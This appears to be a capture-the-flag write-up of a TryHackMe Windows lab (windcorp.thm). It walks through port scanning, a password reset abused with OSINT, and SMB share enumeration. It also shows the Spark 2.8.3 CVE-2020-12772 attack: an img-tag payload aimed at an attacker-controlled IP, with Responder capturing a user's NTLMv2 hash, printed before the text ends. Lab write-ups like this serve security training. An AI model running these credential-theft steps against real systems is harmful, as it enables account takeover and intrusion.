← Back to list

Case: Spark-WinRM

Spark|WinRM|Windows RPC|Mimikatz|Impacket|NTLM|PrivEsc

Baris Dincer · 2024-08-30 11:04 · 5 claps · 21.1 min read
#freedomofinternet #cybersecurity #ntlm #windows #penetration-testing
Open on Medium ↗
Wiki topics: 🔒 · Cybersecurity

Case: Spark-WinRM

Spark|WinRM|Windows RPC|Mimikatz|Impacket|NTLM|PrivEsc

Lab: https://tryhackme.com/r/room/ra

Scenario Introduction

After infiltrating SMB, we will obtain information about the system, then we will learn the NTLM hash of a user by using a vulnerability defined in Spark, and then we will connect via WinRM.

Discovery Phase

Nmap command:

$ nmap -sS -sV -T4 -A -Pn --min-rate=300 --max-retries=3 -oN nmap_result.txt -p- $target_ip

[redacted]
[redacted]

PORT      STATE SERVICE             VERSION
53/tcp    open  domain              Simple DNS Plus
80/tcp    open  http                Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Windcorp.
|_http-server-header: Microsoft-IIS/10.0
88/tcp    open  kerberos-sec        Microsoft Windows Kerberos (server time: 2024-08-30 07:51:06Z)
135/tcp   open  msrpc               Microsoft Windows RPC
139/tcp   open  netbios-ssn         Microsoft Windows netbios-ssn
389/tcp   open  ldap                Microsoft Windows Active Directory LDAP (Domain: windcorp.thm0., Site: Default-First-Site-Name)
443/tcp   open  ssl/http            Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
| ssl-cert: Subject: commonName=Windows Admin Center
| Subject Alternative Name: DNS:WIN-2FAA40QQ70B
| Not valid before: 2020-04-30T14:41:03
|_Not valid after:  2020-06-30T14:41:02
| http-ntlm-info: 
|   Target_Name: WINDCORP
|   NetBIOS_Domain_Name: WINDCORP
|   NetBIOS_Computer_Name: FIRE
|   DNS_Domain_Name: windcorp.thm
|   DNS_Computer_Name: Fire.windcorp.thm
|   DNS_Tree_Name: windcorp.thm
|_  Product_Version: 10.0.17763
| tls-alpn: 
|_  http/1.1
|_http-title: Site doesn't have a title.
|_ssl-date: 2024-08-30T07:53:15+00:00; -1m44s from scanner time.
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http          Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ldapssl?
2179/tcp  open  vmrdp?
3268/tcp  open  ldap                Microsoft Windows Active Directory LDAP (Domain: windcorp.thm0., Site: Default-First-Site-Name)
3269/tcp  open  globalcatLDAPssl?
3389/tcp  open  ms-wbt-server       Microsoft Terminal Services
| ssl-cert: Subject: commonName=Fire.windcorp.thm
| Not valid before: 2024-08-29T07:37:21
|_Not valid after:  2025-02-28T07:37:21
|_ssl-date: 2024-08-30T07:53:17+00:00; -1m43s from scanner time.
5222/tcp  open  jabber
| ssl-cert: Subject: commonName=fire.windcorp.thm
| Subject Alternative Name: DNS:fire.windcorp.thm, DNS:*.fire.windcorp.thm
| Not valid before: 2020-05-01T08:39:00
|_Not valid after:  2025-04-30T08:39:00
|_ssl-date: 2024-08-30T07:53:20+00:00; -1m43s from scanner time.
| fingerprint-strings: 
|   RPCCheck: 
|_    <stream:error xmlns:stream="http://etherx.jabber.org/streams"><not-well-formed xmlns="urn:ietf:params:xml:ns:xmpp-streams"/></stream:error></stream:stream>
| xmpp-info: 
|   STARTTLS Failed
|   info: 
|     unknown: 
|     errors: 
|       invalid-namespace
|       (timeout)
|     xmpp: 
|       version: 1.0
|     features: 
|     capabilities: 
|     stream_id: 1dpww4atyb
|     auth_mechanisms: 
|_    compression_methods: 
5223/tcp  open  ssl/jabber
|_ssl-date: 2024-08-30T07:53:17+00:00; -1m43s from scanner time.
| ssl-cert: Subject: commonName=fire.windcorp.thm
| Subject Alternative Name: DNS:fire.windcorp.thm, DNS:*.fire.windcorp.thm
| Not valid before: 2020-05-01T08:39:00
|_Not valid after:  2025-04-30T08:39:00
| xmpp-info: 
|   STARTTLS Failed
|   info: 
|     unknown: 
|     xmpp: 
|     features: 
|     capabilities: 
|     compression_methods: 
|     errors: 
|       (timeout)
|_    auth_mechanisms: 
| fingerprint-strings: 
|   RPCCheck: 
|_    <stream:error xmlns:stream="http://etherx.jabber.org/streams"><not-well-formed xmlns="urn:ietf:params:xml:ns:xmpp-streams"/></stream:error></stream:stream>
5229/tcp  open  jaxflow?
5262/tcp  open  jabber              Ignite Realtime Openfire Jabber server 3.10.0 or later
| xmpp-info: 
|   STARTTLS Failed
|   info: 
|     unknown: 
|     errors: 
|       invalid-namespace
|       (timeout)
|     xmpp: 
|       version: 1.0
|     features: 
|     capabilities: 
|     stream_id: w0lxxirxl
|     auth_mechanisms: 
|_    compression_methods: 
5263/tcp  open  ssl/jabber          Ignite Realtime Openfire Jabber server 3.10.0 or later
| ssl-cert: Subject: commonName=fire.windcorp.thm
| Subject Alternative Name: DNS:fire.windcorp.thm, DNS:*.fire.windcorp.thm
| Not valid before: 2020-05-01T08:39:00
|_Not valid after:  2025-04-30T08:39:00
|_ssl-date: 2024-08-30T07:53:17+00:00; -1m43s from scanner time.
| xmpp-info: 
|   STARTTLS Failed
|   info: 
|     unknown: 
|     xmpp: 
|     features: 
|     capabilities: 
|     compression_methods: 
|     errors: 
|       (timeout)
|_    auth_mechanisms: 
5269/tcp  open  xmpp                Wildfire XMPP Client
| xmpp-info: 
|   STARTTLS Failed
|   info: 
|     unknown: 
|     xmpp: 
|     features: 
|     capabilities: 
|     compression_methods: 
|     errors: 
|       (timeout)
|_    auth_mechanisms: 
5270/tcp  open  ssl/xmpp            Wildfire XMPP Client
| ssl-cert: Subject: commonName=fire.windcorp.thm
| Subject Alternative Name: DNS:fire.windcorp.thm, DNS:*.fire.windcorp.thm
| Not valid before: 2020-05-01T08:39:00
|_Not valid after:  2025-04-30T08:39:00
|_ssl-date: 2024-08-30T07:53:17+00:00; -1m43s from scanner time.
5275/tcp  open  jabber              Ignite Realtime Openfire Jabber server 3.10.0 or later
| xmpp-info: 
|   STARTTLS Failed
|   info: 
|     unknown: 
|     errors: 
|       invalid-namespace
|       (timeout)
|     xmpp: 
|       version: 1.0
|     features: 
|     capabilities: 
|     stream_id: 8x7lqxvoh3
|     auth_mechanisms: 
|_    compression_methods: 
5276/tcp  open  ssl/jabber          Ignite Realtime Openfire Jabber server 3.10.0 or later
| xmpp-info: 
|   STARTTLS Failed
|   info: 
|     unknown: 
|     xmpp: 
|     features: 
|     capabilities: 
|     compression_methods: 
|     errors: 
|       (timeout)
|_    auth_mechanisms: 
| ssl-cert: Subject: commonName=fire.windcorp.thm
| Subject Alternative Name: DNS:fire.windcorp.thm, DNS:*.fire.windcorp.thm
| Not valid before: 2020-05-01T08:39:00
|_Not valid after:  2025-04-30T08:39:00
|_ssl-date: 2024-08-30T07:53:15+00:00; -1m44s from scanner time.
5985/tcp  open  http                Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7070/tcp  open  http                Jetty 9.4.18.v20190429
|_http-title: Openfire HTTP Binding Service
|_http-server-header: Jetty(9.4.18.v20190429)
7443/tcp  open  ssl/http            Jetty 9.4.18.v20190429
|_http-server-header: Jetty(9.4.18.v20190429)
| ssl-cert: Subject: commonName=fire.windcorp.thm
| Subject Alternative Name: DNS:fire.windcorp.thm, DNS:*.fire.windcorp.thm
| Not valid before: 2020-05-01T08:39:00
|_Not valid after:  2025-04-30T08:39:00
|_http-title: Openfire HTTP Binding Service
7777/tcp  open  socks5              (No authentication; connection failed)
| socks-auth-info: 
|_  No authentication
9090/tcp  open  zeus-admin?
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Date: Fri, 30 Aug 2024 07:51:05 GMT
|     Last-Modified: Fri, 31 Jan 2020 17:54:10 GMT
|     Content-Type: text/html
|     Accept-Ranges: bytes
|     Content-Length: 115
|     <html>
|     <head><title></title>
|     <meta http-equiv="refresh" content="0;URL=index.jsp">
|     </head>
|     <body>
|     </body>
|     </html>
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     Date: Fri, 30 Aug 2024 07:51:16 GMT
|     Allow: GET,HEAD,POST,OPTIONS
|   JavaRMI, drda, ibm-db2-das, informix: 
|     HTTP/1.1 400 Illegal character CNTL=0x0
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
|   SqueezeCenter_CLI: 
|     HTTP/1.1 400 No URI
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 49
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: No URI</pre>
|   WMSRequest: 
|     HTTP/1.1 400 Illegal character CNTL=0x1
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|_    <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x1</pre>
9091/tcp  open  ssl/xmltec-xmlmail?
| ssl-cert: Subject: commonName=fire.windcorp.thm
| Subject Alternative Name: DNS:fire.windcorp.thm, DNS:*.fire.windcorp.thm
| Not valid before: 2020-05-01T08:39:00
|_Not valid after:  2025-04-30T08:39:00
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP: 
|     HTTP/1.1 400 Illegal character CNTL=0x0
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Date: Fri, 30 Aug 2024 07:51:31 GMT
|     Last-Modified: Fri, 31 Jan 2020 17:54:10 GMT
|     Content-Type: text/html
|     Accept-Ranges: bytes
|     Content-Length: 115
|     <html>
|     <head><title></title>
|     <meta http-equiv="refresh" content="0;URL=index.jsp">
|     </head>
|     <body>
|     </body>
|     </html>
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     Date: Fri, 30 Aug 2024 07:51:33 GMT
|     Allow: GET,HEAD,POST,OPTIONS
|   Help: 
|     HTTP/1.1 400 No URI
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 49
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: No URI</pre>
|   RPCCheck: 
|     HTTP/1.1 400 Illegal character OTEXT=0x80
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 71
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
|   RTSPRequest: 
|     HTTP/1.1 400 Unknown Version
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 58
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Unknown Version</pre>
|   SSLSessionReq: 
|     HTTP/1.1 400 Illegal character CNTL=0x16
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 70
|     Connection: close
|_    <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x16</pre>
9389/tcp  open  mc-nmf              .NET Message Framing
49669/tcp open  msrpc               Microsoft Windows RPC
49674/tcp open  ncacn_http          Microsoft Windows RPC over HTTP 1.0
49675/tcp open  msrpc               Microsoft Windows RPC
49676/tcp open  msrpc               Microsoft Windows RPC
49705/tcp open  msrpc               Microsoft Windows RPC
49915/tcp open  msrpc               Microsoft Windows RPC

We have a large structure in front of us, we have obtained a lot of port and version information. We saw different DNS definitions according to RDP NTLM information.

3389/tcp  open     ms-wbt-server       Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: WINDCORP
|   NetBIOS_Domain_Name: WINDCORP
|   NetBIOS_Computer_Name: FIRE
|   DNS_Domain_Name: windcorp.thm 
|   DNS_Computer_Name: Fire.windcorp.thm
|   DNS_Tree_Name: windcorp.thm

You should register these in your local DNS.

$ nano /etc/hosts

10.10.187.82    windcorp.thm fire.windcorp.thm

Let’s send a query to these points.

$ curl -iLX GET http://fire.windcorp.thm

[redacted]
[redacted]

<script>
function reset() {
  window.open("http://fire.windcorp.thm/reset.asp",  "_blank", "toolbar=no,scrollbars=no,resizable=no,top=500,left=500,width=925,height=300");

[redacted]
[redacted]

        <div class="col-xl-9 mx-auto">
          <h1 class="mb-5">Welcome to our company portal!</h1>
        </div>

[redacted]
[redacted]

<li><img src="http://fire.windcorp.thm:9090/plugins/presence/status?jid=organicfish718@fire.windcorp.thm"> <a href="xmpp:organicfish718@fire.windcorp.thm">Antonietta Vidal</a></li>
<li><img src="http://fire.windcorp.thm:9090/plugins/presence/status?jid=organicwolf509@fire.windcorp.thm"> <a href="xmpp:organicwolf509@fire.windcorp.thm">Britney Palmer</a></li>
<li><img src="http://fire.windcorp.thm:9090/plugins/presence/status?jid=tinywolf424@fire.windcorp.thm"> <a href="xmpp:tinywolf424@fire.windcorp.thm">Brittany Cruz</a></li>
<li><img src="http://fire.windcorp.thm:9090/plugins/presence/status?jid=angrybird253@fire.windcorp.thm"> <a href="xmpp:angrybird253@fire.windcorp.thm">Carla Meyer</a></li>
<li><img src="http://fire.windcorp.thm:9090/plugins/presence/status?jid=buse@fire.windcorp.thm"> <a href="xmpp:buse@fire.windcorp.thm">Buse Candan</a></li>
<li><img src="http://fire.windcorp.thm:9090/plugins/presence/status?jid=Edeltraut@fire.windcorp.thm"><a href="xmpp:Edeltraut@fire.windcorp.thm"> Edeltraut Daub</a></li>
<li><img src="http://fire.windcorp.thm:9090/plugins/presence/status?jid=Edward@fire.windcorp.thm"><a href="xmpp:Edward@fire.windcorp.thm"> Edward Lewis</a></li>
<li><img src="http://fire.windcorp.thm:9090/plugins/presence/status?jid=Emile@fire.windcorp.thm"><a href="xmpp:Emile@fire.windcorp.thm"> Emile Lavoie</a></li>
<li><img src="http://fire.windcorp.thm:9090/plugins/presence/status?jid=tinygoose102@fire.windcorp.thm"><a href="xmpp:tinygoose102@fire.windcorp.thm"> Emile Henry</a></li>
<li><img src="http://fire.windcorp.thm:9090/plugins/presence/status?jid=brownostrich284@fire.windcorp.thm"><a href="xmpp:brownostrich284@fire.windcorp.thm"> Emily Anderson</a></li>
<li><img src="http://fire.windcorp.thm:9090/plugins/presence/status?jid=sadswan869@fire.windcorp.thm"><a href="xmpp:sadswan869@fire.windcorp.thm"> Hemmo Boschma</a></li>
<li><img src="http://fire.windcorp.thm:9090/plugins/presence/status?jid=goldencat416@fire.windcorp.thm"><a href="xmpp:sadswan869@fire.windcorp.thm"> Isabella Hughes</a></li>
<li><img src="http://fire.windcorp.thm:9090/plugins/presence/status?jid=whiteleopard529@fire.windcorp.thm"><a href="xmpp:whiteleopard529@fire.windcorp.thm"> Isra Saur</a></li>
<li><img src="http://fire.windcorp.thm:9090/plugins/presence/status?jid=happymeercat399@fire.windcorp.thm"><a href="xmpp:happymeercat399@fire.windcorp.thm"> Jackson Vasquez</a></li>
<li><img src="http://fire.windcorp.thm:9090/plugins/presence/status?jid=orangegorilla428@fire.windcorp.thm"><a href="xmpp:orangegorilla428@fire.windcorp.thm"> Jaqueline Dittmer</a></li>

[redacted]
[redacted]

          <div class="testimonial-item mx-auto mb-5 mb-lg-0">
            <img class="img-fluid rounded-circle mb-3" src="img/Emilieje.jpg" alt="">
            <h5>Emily Jensen</h5>
            <p class="font-weight-light mb-0">"Love it! Thanks for beleiving in me!"</p>
          </div>
        </div>
        <div class="col-lg-4">
          <div class="testimonial-item mx-auto mb-5 mb-lg-0">
            <img class="img-fluid rounded-circle mb-3" src="img/lilyleAndSparky.jpg" alt="">
            <h5>Lily Levesque</h5>
            <p class="font-weight-light mb-0">"I love being able to bring my best friend to work with me!"</p>
          </div>
        </div>
        <div class="col-lg-4">
          <div class="testimonial-item mx-auto mb-5 mb-lg-0">
            <img class="img-fluid rounded-circle mb-3" src="img/kirkug.jpg" alt="">
            <h5>Kirk Uglas</h5>
            <p class="font-weight-light mb-0">"Every day is a treat!"</p>
          </div>

[redacted]
[redacted]

output

output

We have received valuable information defined on the site, the first striking detail is the potential user emails.

organicfish718@fire.windcorp.thm
organicwolf509@fire.windcorp.thm
tinywolf424@fire.windcorp.thm
angrybird253@fire.windcorp.thm
buse@fire.windcorp.thm
Edeltraut@fire.windcorp.thm
Edward@fire.windcorp.thm
Emile@fire.windcorp.thm
tinygoose102@fire.windcorp.thm
brownostrich284@fire.windcorp.thm
sadswan869@fire.windcorp.thm
goldencat416@fire.windcorp.thm
whiteleopard529@fire.windcorp.thm
happymeercat399@fire.windcorp.thm
orangegorilla428@fire.windcorp.thm

We can also generate usernames from these.

organicfish718
organicwolf509
tinywolf424
angrybird253
buse
Edeltraut
edeltraut
Edward
edward
Emile
emile
brownostrich284
sadswan869
whiteleopard529
happymeercat399
orangegorilla428

You should record these.

There are also some images, these provide you with details about the employees.

output

output

We have seen the existence of an endpoint about password reset:

http://fire.windcorp.thm/reset.asp

output

output

Password Reset & Basic OSINT

Now we can try to change a user’s password. We learned the name of a user and the name of the dog in the image on an image defined on the site.

output

output

output

output

Yes, the password has been reset successfully, now we have a credential.

lilyle : ChangeMe#1234

Obtaining SMB Shares and System Information

We discovered that SMB is on. We can try to establish a connection through that.

$ crackmapexec smb windcorp.thm -u lilyle -p 'ChangeMe#1234' --shares --pass-pol

SMB         windcorp.thm    445    FIRE             [*] Windows 10 / Server 2019 Build 17763 x64 (name:FIRE) (domain:windcorp.thm) (signing:True) (SMBv1:False)
SMB         windcorp.thm    445    FIRE             [+] windcorp.thm\lilyle:ChangeMe#1234

[redacted]
[redacted]

SMB         windcorp.thm    445    FIRE             Share           Permissions     Remark
SMB         windcorp.thm    445    FIRE             -----           -----------     ------
SMB         windcorp.thm    445    FIRE             ADMIN$                          Remote Admin
SMB         windcorp.thm    445    FIRE             C$                              Default share
SMB         windcorp.thm    445    FIRE             IPC$            READ            Remote IPC
SMB         windcorp.thm    445    FIRE             NETLOGON        READ            Logon server share 
SMB         windcorp.thm    445    FIRE             Shared          READ            
SMB         windcorp.thm    445    FIRE             SYSVOL          READ            Logon server share 
SMB         windcorp.thm    445    FIRE             Users           READ            
SMB         windcorp.thm    445    FIRE             [+] Dumping password info for domain: WINDCORP
SMB         windcorp.thm    445    FIRE             Minimum password length: 7
SMB         windcorp.thm    445    FIRE             Password history length: 24
SMB         windcorp.thm    445    FIRE             Maximum password age: 41 days 23 hours 53 minutes 
SMB         windcorp.thm    445    FIRE             
SMB         windcorp.thm    445    FIRE             Password Complexity Flags: 010001
SMB         windcorp.thm    445    FIRE                 Domain Refuse Password Change: 0
SMB         windcorp.thm    445    FIRE                 Domain Password Store Cleartext: 1
SMB         windcorp.thm    445    FIRE                 Domain Password Lockout Admins: 0
SMB         windcorp.thm    445    FIRE                 Domain Password No Clear Change: 0
SMB         windcorp.thm    445    FIRE                 Domain Password No Anon Change: 0
SMB         windcorp.thm    445    FIRE                 Domain Password Complex: 1
SMB         windcorp.thm    445    FIRE             
SMB         windcorp.thm    445    FIRE             Minimum password age: 1 day 4 minutes 
SMB         windcorp.thm    445    FIRE             Reset Account Lockout Counter: 2 minutes 
SMB         windcorp.thm    445    FIRE             Locked Account Duration: 2 minutes 
SMB         windcorp.thm    445    FIRE             Account Lockout Threshold: 5
SMB         windcorp.thm    445    FIRE             Forced Log off Time: Not Set

We got shares:

Share           Permissions     Remark
-----           -----------     ------
ADMIN$                          Remote Admin
C$                              Default share
IPC$            READ            Remote IPC
NETLOGON        READ            Logon server share 
Shared          READ            
SYSVOL          READ            Logon server share 
Users           READ

According to the password policy there is a lockout threshold of 5 which means if we provide the wrong password 5 times for a user, then we would end up locking out that account for the Locked Account Duration which is 2 minutes in this case.

Now we can look at the contents of the shares recursively.

$ smbmap -u 'lilyle' -p 'ChangeMe#1234' -H windcorp.thm  -r

[+] IP: 10.10.187.82:445        Name: windcorp.thm              Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        ./IPC$
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    InitShutdown
        fr--r--r--                5 Sun Dec 31 19:03:58 1600    lsass
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    ntsvcs
        fr--r--r--                4 Sun Dec 31 19:03:58 1600    scerpc
        fr--r--r--                1 Sun Dec 31 19:03:58 1600    Winsock2\CatalogChangeListener-250-0
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    epmapper
        fr--r--r--                1 Sun Dec 31 19:03:58 1600    Winsock2\CatalogChangeListener-2bc-0
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    LSM_API_service
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    eventlog
        fr--r--r--                1 Sun Dec 31 19:03:58 1600    Winsock2\CatalogChangeListener-5c8-0
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    atsvc
        fr--r--r--                1 Sun Dec 31 19:03:58 1600    Winsock2\CatalogChangeListener-768-0
        fr--r--r--                5 Sun Dec 31 19:03:58 1600    wkssvc
        fr--r--r--                1 Sun Dec 31 19:03:58 1600    Winsock2\CatalogChangeListener-348-0
        fr--r--r--                1 Sun Dec 31 19:03:58 1600    Winsock2\CatalogChangeListener-348-1
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    RpcProxy\49674
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    63b9cfeb0aeafc69
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    RpcProxy\593
        fr--r--r--                4 Sun Dec 31 19:03:58 1600    srvsvc
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    spoolss
        fr--r--r--                1 Sun Dec 31 19:03:58 1600    Winsock2\CatalogChangeListener-9ac-0
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    netdfs
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    ROUTER
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    W32TIME_ALT
        fr--r--r--                1 Sun Dec 31 19:03:58 1600    Winsock2\CatalogChangeListener-334-0
        fr--r--r--                1 Sun Dec 31 19:03:58 1600    PSHost.133694770150844361.4064.DefaultAppDomain.powershell
        fr--r--r--                1 Sun Dec 31 19:03:58 1600    Winsock2\CatalogChangeListener-cc0-0
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    TermSrv_API_service
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    Ctx_WinStation_API_service
        fr--r--r--                3 Sun Dec 31 19:03:58 1600    SessEnvPublicRpc
        fr--r--r--                1 Sun Dec 31 19:03:58 1600    Winsock2\CatalogChangeListener-1708-0
        fr--r--r--                1 Sun Dec 31 19:03:58 1600    PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER
        fr--r--r--                1 Sun Dec 31 19:03:58 1600    PSHost.133694771381775684.7116.DefaultAppDomain.powershell
        fr--r--r--                1 Sun Dec 31 19:03:58 1600    PSHost.133694770137980086.3532.DefaultAppDomain.sme
        fr--r--r--                1 Sun Dec 31 19:03:58 1600    Winsock2\CatalogChangeListener-cac-0
        fr--r--r--                1 Sun Dec 31 19:03:58 1600    iisipm4309e33a-9494-4553-bf48-cc7f6ca4e72b
        fr--r--r--                1 Sun Dec 31 19:03:58 1600    iislogpipe4f9fd9d3-af99-42ff-af51-f14b237070e1
        NETLOGON                                                READ ONLY       Logon server share 
        ./NETLOGON
        dr--r--r--                0 Sat May  2 06:02:19 2020    .
        dr--r--r--                0 Sat May  2 06:02:19 2020    ..
        Shared                                                  READ ONLY
        ./Shared
        dr--r--r--                0 Fri May 29 20:45:42 2020    .
        dr--r--r--                0 Fri May 29 20:45:42 2020    ..
        fr--r--r--               45 Fri May  1 11:32:36 2020    Flag 1.txt
        fr--r--r--         29526628 Fri May 29 20:45:01 2020    spark_2_8_3.deb
        fr--r--r--         99555201 Sun May  3 07:08:39 2020    spark_2_8_3.dmg
        fr--r--r--         78765568 Sun May  3 07:08:39 2020    spark_2_8_3.exe
        fr--r--r--        123216290 Sun May  3 07:08:39 2020    spark_2_8_3.tar.gz
        SYSVOL                                                  READ ONLY       Logon server share 
        ./SYSVOL
        dr--r--r--                0 Sat May  2 06:02:20 2020    .
        dr--r--r--                0 Sat May  2 06:02:20 2020    ..
        dr--r--r--                0 Sat May  2 06:02:20 2020    NRznLVEcPj
        dr--r--r--                0 Thu Apr 30 11:11:10 2020    windcorp.thm
        Users                                                   READ ONLY
        ./Users
        dw--w--w--                0 Sat May  2 18:05:58 2020    .
        dw--w--w--                0 Sat May  2 18:05:58 2020    ..
        dr--r--r--                0 Sun May 10 07:18:11 2020    Administrator
        dr--r--r--                0 Thu Apr 30 20:33:55 2020    All Users
        dr--r--r--                0 Fri May  1 09:09:44 2020    angrybird
        dr--r--r--                0 Fri May  1 09:09:34 2020    berg
        dr--r--r--                0 Fri May  1 09:09:22 2020    bluefrog579
        dr--r--r--                0 Sun May  3 09:30:02 2020    brittanycr
        dr--r--r--                0 Fri May  1 09:09:08 2020    brownostrich284
        dr--r--r--                0 Fri Aug 30 03:38:51 2024    buse
        dw--w--w--                0 Thu Apr 30 19:35:11 2020    Default
        dr--r--r--                0 Thu Apr 30 20:33:55 2020    Default User
        fr--r--r--              174 Thu Apr 30 20:31:55 2020    desktop.ini
        dr--r--r--                0 Fri May  1 09:08:54 2020    edward
        dr--r--r--                0 Sat May  2 19:30:16 2020    freddy
        dr--r--r--                0 Fri May  1 09:08:28 2020    garys
        dr--r--r--                0 Fri Aug 30 04:21:06 2024    goldencat416
        dr--r--r--                0 Fri May  1 09:08:17 2020    goldenwol
        dr--r--r--                0 Fri May  1 09:08:06 2020    happ
        dr--r--r--                0 Fri May  1 09:07:53 2020    happyme
        dr--r--r--                0 Fri May  1 09:07:42 2020    Luis
        dr--r--r--                0 Fri May  1 09:07:31 2020    orga
        dr--r--r--                0 Fri May  1 09:07:19 2020    organicf
        dr--r--r--                0 Fri Aug 30 04:21:59 2024    organicfish718
        dr--r--r--                0 Fri May  1 09:07:06 2020    pete
        dw--w--w--                0 Thu Apr 30 10:35:47 2020    Public
        dr--r--r--                0 Fri May  1 09:06:54 2020    purplecat
        dr--r--r--                0 Fri May  1 09:06:42 2020    purplepanda
        dr--r--r--                0 Fri May  1 09:06:31 2020    sadswan
        dr--r--r--                0 Fri Aug 30 04:17:23 2024    sadswan869
        dr--r--r--                0 Fri May  1 09:06:20 2020    sheela
        dr--r--r--                0 Fri May  1 09:05:39 2020    silver
        dr--r--r--                0 Fri May  1 09:05:24 2020    smallf
        dr--r--r--                0 Fri May  1 09:05:05 2020    spiff
        dr--r--r--                0 Fri May  1 09:04:49 2020    tinygoos
        dr--r--r--                0 Fri May  1 09:03:57 2020    whiteleopard

We found the actual user definitions. Save these names.

angrybird
berg
bluefrog579
brittanycr
brownostrich284
buse
edward
freddy
garys
goldencat416
goldenwol
happ
happyme
Luis
orga
organicf
organicfish718
pete
purplecat
purplepanda
sadswan
sadswan869
sheela
silver
smallf
spiff
tinygoos
whiteleopard

We also obtained information about Spark. Its version is 2.8.3.

spark_2_8_3.deb
spark_2_8_3.dmg
spark_2_8_3.exe
spark_2_8_3.tar.gz

We can log in as the lilyle user with another command.

$ smbclient \\\\windcorp.thm\\Shared -U Windcorp.thm\\lilyle
Password for [WINDCORP.THM\lilyle]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Fri May 29 20:45:42 2020
  ..                                  D        0  Fri May 29 20:45:42 2020
  Flag 1.txt                          A       45  Fri May  1 11:32:36 2020
  spark_2_8_3.deb                     A 29526628  Fri May 29 20:45:01 2020
  spark_2_8_3.dmg                     A 99555201  Sun May  3 07:06:58 2020
  spark_2_8_3.exe                     A 78765568  Sun May  3 07:05:56 2020
  spark_2_8_3.tar.gz                  A 123216290  Sun May  3 07:07:24 2020

                15587583 blocks of size 4096. 10908389 blocks available
smb: \>

Spark Vulnerability & Exploitation Phase

We noticed that Spark version 2.8.3 was installed. This allows us to conduct an exploit investigation on this version. We may conduct research on the Internet.

[embed]NVD An issue was discovered in Ignite Realtime Spark 2.8.3 (and the ROAR plugin for it) on Windows. A chat message can…nvd.nist.gov

[embed]cves/cve-2020-12772/CVE-2020-12772.md at master · theart42/cves CVE's we discovered along the way. Contribute to theart42/cves development by creating an account on GitHub.github.com

We also have CVE ID now: CVE-2020-12772.

When we opened a chat with another user, we could send an <img tag to that user with an external URL as the source of that image.

<img src=[external_ip]/test.img>

Each time the user clicks the link, or the ROAR module automatically preloads it, the external server receives the request for the image, together with the NTLM hashes from the user that visits the link, i.e. the user we are chatting with.

Now we need to test this on the required version. You can obtain the installation file by transferring the .deb file on SMB to your local. Or you can use the resources below.

smb: \> get spark_2_8_3.deb
getting file \spark_2_8_3.deb of size 29526628 as spark_2_8_3.deb (1242.5 KiloBytes/sec) (average 1242.5 KiloBytes/sec)

You can start the installation with the following command.

$ dpkg -i spark_2_8_3.deb

For correct installation openjdk-8-jre and oracle-java8-jre must be on your system. Check this source: https://itadminsbraindump.wordpress.com/2017/08/04/how-to-install-spark-2-8-3-im-for-openfire-in-ubuntu-or-lubuntu-17-04-any-version/

After installation, you need to log in.

output

output

output

output

You need to explore the app a bit, then start a chat.

Actions -> Start a Chat -> Buse

output

output

You must activate Responder.

$ responder -I tun0 -i 10.2.37.37

Just send a message with our payload.

<img src=”http://10.2.37.37/anyimage.jpg">

Then you get the NTLM hash.

[+] Listening for events...
[HTTP] NTLMv2 Client   : 10.10.226.131
[HTTP] NTLMv2 Username : WINDCORP\buse
[HTTP] NTLMv2 Hash     : buse::WINDCORP:581eb034fb28c39c:54A0D21F2C7F9C9FC662887D404ADBE6:010100000000
00003016F4F0AEBAD6019F1E18DD6C6FF8DD000000000200060053004D0042000100160053004D0042002D0054004F004F004C
004B00490054000400120073006D0062002E006C006F00630061006C0003002800730065007200760065007200320030003000
